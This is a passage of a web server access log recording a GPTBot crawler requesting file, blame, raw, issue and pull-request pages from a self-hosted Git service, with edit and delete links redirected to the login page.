192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13990] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 1011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10713] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:18:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:18:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:18:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:59:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:18:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:18:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:18:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:18:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 16083] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:18:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:59:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13807] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:18:59:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:59:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:59:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:59:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:18:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10135] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:18:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17522] [Gzip 9.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:18:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9879] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:18:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 1021] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:18:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:18:59:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:18:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:18:59:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:18:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:18:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:18:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 1005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:18:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:18:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:18:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:59:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:18:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:18:59:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr 